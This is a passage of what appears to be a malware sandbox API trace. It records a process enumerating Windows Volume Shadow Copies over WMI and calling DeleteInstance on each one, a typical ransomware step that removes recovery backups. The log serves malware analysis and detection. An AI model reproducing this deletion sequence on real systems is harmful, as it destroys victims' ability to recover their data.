returned 0x0 [0133.504] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0133.504] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0133.504] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0133.504] IWbemClassObject:Get (in: This=0x1c910480, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0133.504] SysStringLen (param_1="root\\cimv2") returned 0xa [0133.504] IWbemClassObject:Get (in: This=0x1c910480, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0133.504] SysStringLen (param_1="root\\cimv2") returned 0xa [0133.504] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0133.504] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0133.504] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0133.504] IWbemClassObject:Get (in: This=0x1c910480, wszName="__CLASS", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0133.504] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0133.504] IWbemClassObject:Get (in: This=0x1c910480, wszName="__CLASS", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0133.504] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0133.507] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c903610, puCount=0x1c64cfa0 | out: puCount=0x1c64cfa0*=0x2) returned 0x0 [0133.507] WbemDefPath:IWbemPath:GetText (in: This=0x1c903610, lFlags=4, puBuffLength=0x1c64cfa0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfa0*=0x54, pszText=0x0) returned 0x0 [0133.507] WbemDefPath:IWbemPath:GetText (in: This=0x1c903610, lFlags=4, puBuffLength=0x1c64cfa0*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfa0*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{C7241040-5C13-409D-A239-55D005C03DE9}\"") returned 0x0 [0133.507] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64cef0 | out: puCount=0x1c64cef0*=0x2) returned 0x0 [0133.507] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cef0*=0x17, pszText=0x0) returned 0x0 [0133.507] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64cef0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0133.507] CoGetContextToken (in: pToken=0x1c64cd80 | out: pToken=0x1c64cd80) returned 0x0 [0133.507] WbemLocator:IUnknown:AddRef (This=0x1b797ce0) returned 0x3 [0133.507] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c950 | out: ppvObject=0x1c64c950*=0x1b797ce0) returned 0x0 [0133.507] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x3 [0133.508] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x2 [0133.508] IWbemClassObject:Get (in: This=0x1c910480, wszName="__GENUS", lFlags=0, pVal=0x1c64cee0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cedc*=0, plFlavor=0x1c64ced8*=0 | out: pVal=0x1c64cee0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64cedc*=3, plFlavor=0x1c64ced8*=64) returned 0x0 [0133.508] WbemDefPath:IWbemPath:GetText (in: This=0x1c903610, lFlags=2, puBuffLength=0x1c64cfb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfb0*=0x3d, pszText=0x0) returned 0x0 [0133.508] WbemDefPath:IWbemPath:GetText (in: This=0x1c903610, lFlags=2, puBuffLength=0x1c64cfb0*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfb0*=0x3d, pszText="Win32_ShadowCopy.ID=\"{C7241040-5C13-409D-A239-55D005C03DE9}\"") returned 0x0 [0133.508] IWbemServices:DeleteInstance (in: This=0x1c8f44f8, strObjectPath="Win32_ShadowCopy.ID=\"{C7241040-5C13-409D-A239-55D005C03DE9}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0134.219] CoTaskMemAlloc (cb=0x8) returned 0x27f6b0 [0134.219] IEnumWbemClassObject:Next (in: This=0x1c8f4788, lTimeout=-1, uCount=0x1, apObjects=0x27f6b0, puReturned=0x1c64d8b8 | out: apObjects=0x27f6b0*=0x1c910730, puReturned=0x1c64d8b8*=0x1) returned 0x0 [0134.221] IUnknown:QueryInterface (in: This=0x1c910730, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cbe0 | out: ppvObject=0x1c64cbe0*=0x1c910730) returned 0x0 [0134.222] IUnknown:QueryInterface (in: This=0x1c910730, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64cc60 | out: ppvObject=0x1c64cc60*=0x0) returned 0x80004002 [0134.222] IUnknown:QueryInterface (in: This=0x1c910730, riid=0x7fef2a9d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64c9f8 | out: ppvObject=0x1c64c9f8*=0x0) returned 0x80004002 [0134.222] IUnknown:AddRef (This=0x1c910730) returned 0x3 [0134.222] CoGetContextToken (in: pToken=0x1c64c8b0 | out: pToken=0x1c64c8b0) returned 0x0 [0134.222] IUnknown:QueryInterface (in: This=0x1c910730, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c870 | out: ppvObject=0x1c64c870*=0x1c910738) returned 0x0 [0134.222] IMarshal:GetUnmarshalClass (in: This=0x1c910738, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c8a0 | out: pCid=0x1c64c8a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0134.223] IUnknown:Release (This=0x1c910738) returned 0x3 [0134.223] CoGetContextToken (in: pToken=0x1c64c880 | out: pToken=0x1c64c880) returned 0x0 [0134.223] IUnknown:AddRef (This=0x1c910730) returned 0x4 [0134.223] IUnknown:QueryInterface (in: This=0x1c910730, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c998 | out: ppvObject=0x1c64c998*=0x0) returned 0x80004002 [0134.223] IUnknown:Release (This=0x1c910730) returned 0x3 [0134.223] IUnknown:Release (This=0x1c910730) returned 0x2 [0134.223] CoGetContextToken (in: pToken=0x1c64cd40 | out: pToken=0x1c64cd40) returned 0x0 [0134.223] CoGetContextToken (in: pToken=0x1c64cc80 | out: pToken=0x1c64cc80) returned 0x0 [0134.223] IUnknown:AddRef (This=0x1c910730) returned 0x3 [0134.224] IUnknown:QueryInterface (in: This=0x1c910730, riid=0x1c64cdc0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c64cda0 | out: ppvObject=0x1c64cda0*=0x1c910730) returned 0x0 [0134.224] IUnknown:Release (This=0x1c910730) returned 0x3 [0134.224] IUnknown:Release (This=0x1c910730) returned 0x2 [0134.224] IUnknown:Release (This=0x1c910730) returned 0x1 [0134.224] CoTaskMemFree (pv=0x27f6b0) [0134.224] CoGetContextToken (in: pToken=0x1c64d6c0 | out: pToken=0x1c64d6c0) returned 0x0 [0134.224] IUnknown:AddRef (This=0x1c910730) returned 0x2 [0134.224] IWbemClassObject:Get (in: This=0x1c910730, wszName="__GENUS", lFlags=0, pVal=0x1c64d830*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d82c*=0, plFlavor=0x1c64d828*=0 | out: pVal=0x1c64d830*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64d82c*=3, plFlavor=0x1c64d828*=64) returned 0x0 [0134.225] IWbemClassObject:Get (in: This=0x1c910730, wszName="__PATH", lFlags=0, pVal=0x1c64d7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d7cc*=0, plFlavor=0x1c64d7c8*=0 | out: pVal=0x1c64d7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}\"", varVal2=0x0), pType=0x1c64d7cc*=8, plFlavor=0x1c64d7c8*=64) returned 0x0 [0134.225] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}\"") returned 0x53 [0134.225] CoGetObjectContext (in: riid=0x1c64d768*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64d760 | out: ppv=0x1c64d760*=0x212498) returned 0x0 [0134.225] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64d780 | out: pAptType=0x1c64d780*=1) returned 0x0 [0134.225] IUnknown:QueryInterface (in: This=0x212498, riid=0x2e77e70*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64d888 | out: ppvObject=0x1c64d888*=0x0) returned 0x80004002 [0134.225] IUnknown:Release (This=0x212498) returned 0x1 [0134.226] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cdf0 | out: ppv=0x1c64cdf0*=0x1c8f1c80) returned 0x0 [0134.227] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f1c80, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64cb00 | out: ppvObject=0x1c64cb00*=0x0) returned 0x80004002 [0134.227] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c8f1c80, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cae8 | out: ppvObject=0x1c64cae8*=0x1c9036d0) returned 0x0 [0134.227] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c9036d0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c9f0 | out: ppvObject=0x1c64c9f0*=0x1c9036d0) returned 0x0 [0134.227] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c9036d0, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64ca70 | out: ppvObject=0x1c64ca70*=0x0) returned 0x80004002 [0134.227] WbemDefPath:IUnknown:AddRef (This=0x1c9036d0) returned 0x3 [0134.228] CoGetContextToken (in: pToken=0x1c64c6c0 | out: pToken=0x1c64c6c0) returned 0x0 [0134.228] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c9036d0, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c680 | out: ppvObject=0x1c64c680*=0x1b7938b0) returned 0x0 [0134.228] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b7938b0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c6b0 | out: pCid=0x1c64c6b0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0134.228] WbemDefPath:IUnknown:Release (This=0x1b7938b0) returned 0x3 [0134.228] CoGetContextToken (in: pToken=0x1c64c690 | out: pToken=0x1c64c690) returned 0x0 [0134.228] WbemDefPath:IUnknown:AddRef (This=0x1c9036d0) returned 0x4 [0134.228] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c9036d0, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c7a8 | out: ppvObject=0x1c64c7a8*=0x0) returned 0x80004002 [0134.228] WbemDefPath:IUnknown:Release (This=0x1c9036d0) returned 0x3 [0134.228] WbemDefPath:IUnknown:Release (This=0x1c9036d0) returned 0x2 [0134.229] WbemDefPath:IUnknown:Release (This=0x1c8f1c80) returned 0x0 [0134.229] WbemDefPath:IUnknown:Release (This=0x1c9036d0) returned 0x1 [0134.229] CoGetContextToken (in: pToken=0x1c64d3c0 | out: pToken=0x1c64d3c0) returned 0x0 [0134.229] CoGetContextToken (in: pToken=0x1c64d300 | out: pToken=0x1c64d300) returned 0x0 [0134.229] WbemDefPath:IUnknown:AddRef (This=0x1c9036d0) returned 0x2 [0134.229] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c9036d0, riid=0x1c64d440*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d420 | out: ppvObject=0x1c64d420*=0x1c9036d0) returned 0x0 [0134.229] WbemDefPath:IUnknown:Release (This=0x1c9036d0) returned 0x2 [0134.229] WbemDefPath:IUnknown:Release (This=0x1c9036d0) returned 0x1 [0134.229] CoGetContextToken (in: pToken=0x1c64d540 | out: pToken=0x1c64d540) returned 0x0 [0134.229] CoGetContextToken (in: pToken=0x1c64d480 | out: pToken=0x1c64d480) returned 0x0 [0134.229] WbemDefPath:IUnknown:AddRef (This=0x1c9036d0) returned 0x2 [0134.230] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c9036d0, riid=0x1c64d5c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d5a0 | out: ppvObject=0x1c64d5a0*=0x1c9036d0) returned 0x0 [0134.230] WbemDefPath:IUnknown:Release (This=0x1c9036d0) returned 0x2 [0134.230] WbemDefPath:IUnknown:AddRef (This=0x1c9036d0) returned 0x3 [0134.230] WbemDefPath:IWbemPath:SetText (This=0x1c9036d0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}\"") returned 0x0 [0134.230] WbemDefPath:IUnknown:Release (This=0x1c9036d0) returned 0x2 [0134.230] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d800 | out: puCount=0x1c64d800*=0x2) returned 0x0 [0134.230] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d800*=0x17, pszText=0x0) returned 0x0 [0134.230] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0134.230] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0134.230] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0134.230] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0134.231] IWbemClassObject:Get (in: This=0x1c910730, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0134.231] SysStringLen (param_1="root\\cimv2") returned 0xa [0134.231] IWbemClassObject:Get (in: This=0x1c910730, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0134.231] SysStringLen (param_1="root\\cimv2") returned 0xa [0134.231] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0134.231] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0134.231] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0134.231] IWbemClassObject:Get (in: This=0x1c910730, wszName="__CLASS", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0134.231] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0134.231] IWbemClassObject:Get (in: This=0x1c910730, wszName="__CLASS", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0134.231] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0134.235] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c9036d0, puCount=0x1c64cfa0 | out: puCount=0x1c64cfa0*=0x2) returned 0x0 [0134.235] WbemDefPath:IWbemPath:GetText (in: This=0x1c9036d0, lFlags=4, puBuffLength=0x1c64cfa0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfa0*=0x54, pszText=0x0) returned 0x0 [0134.235] WbemDefPath:IWbemPath:GetText (in: This=0x1c9036d0, lFlags=4, puBuffLength=0x1c64cfa0*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfa0*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}\"") returned 0x0 [0134.235] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64cef0 | out: puCount=0x1c64cef0*=0x2) returned 0x0 [0134.235] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cef0*=0x17, pszText=0x0) returned 0x0 [0134.235] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64cef0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0134.235] CoGetContextToken (in: pToken=0x1c64cd80 | out: pToken=0x1c64cd80) returned 0x0 [0134.235] WbemLocator:IUnknown:AddRef (This=0x1b797ce0) returned 0x3 [0134.235] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c950 | out: ppvObject=0x1c64c950*=0x1b797ce0) returned 0x0 [0134.235] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x3 [0134.235] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x2 [0134.236] IWbemClassObject:Get (in: This=0x1c910730, wszName="__GENUS", lFlags=0, pVal=0x1c64cee0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cedc*=0, plFlavor=0x1c64ced8*=0 | out: pVal=0x1c64cee0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64cedc*=3, plFlavor=0x1c64ced8*=64) returned 0x0 [0134.236] WbemDefPath:IWbemPath:GetText (in: This=0x1c9036d0, lFlags=2, puBuffLength=0x1c64cfb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfb0*=0x3d, pszText=0x0) returned 0x0 [0134.236] WbemDefPath:IWbemPath:GetText (in: This=0x1c9036d0, lFlags=2, puBuffLength=0x1c64cfb0*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfb0*=0x3d, pszText="Win32_ShadowCopy.ID=\"{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}\"") returned 0x0 [0134.236] IWbemServices:DeleteInstance (in: This=0x1c8f44f8, strObjectPath="Win32_ShadowCopy.ID=\"{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0134.982] CoTaskMemAlloc (cb=0x8) returned 0x27f6b0 [0134.982] IEnumWbemClassObject:Next (in: This=0x1c8f4788, lTimeout=-1, uCount=0x1, apObjects=0x27f6b0, puReturned=0x1c64d8b8 | out: apObjects=0x27f6b0*=0x1c9109e0, puReturned=0x1c64d8b8*=0x1) returned 0x0 [0134.984] IUnknown:QueryInterface (in: This=0x1c9109e0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cbe0 | out: ppvObject=0x1c64cbe0*=0x1c9109e0) returned 0x0 [0134.984] IUnknown:QueryInterface (in: This=0x1c9109e0, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64cc60 | out: ppvObject=0x1c64cc60*=0x0) returned 0x80004002 [0134.984] IUnknown:QueryInterface (in: This=0x1c9109e0, 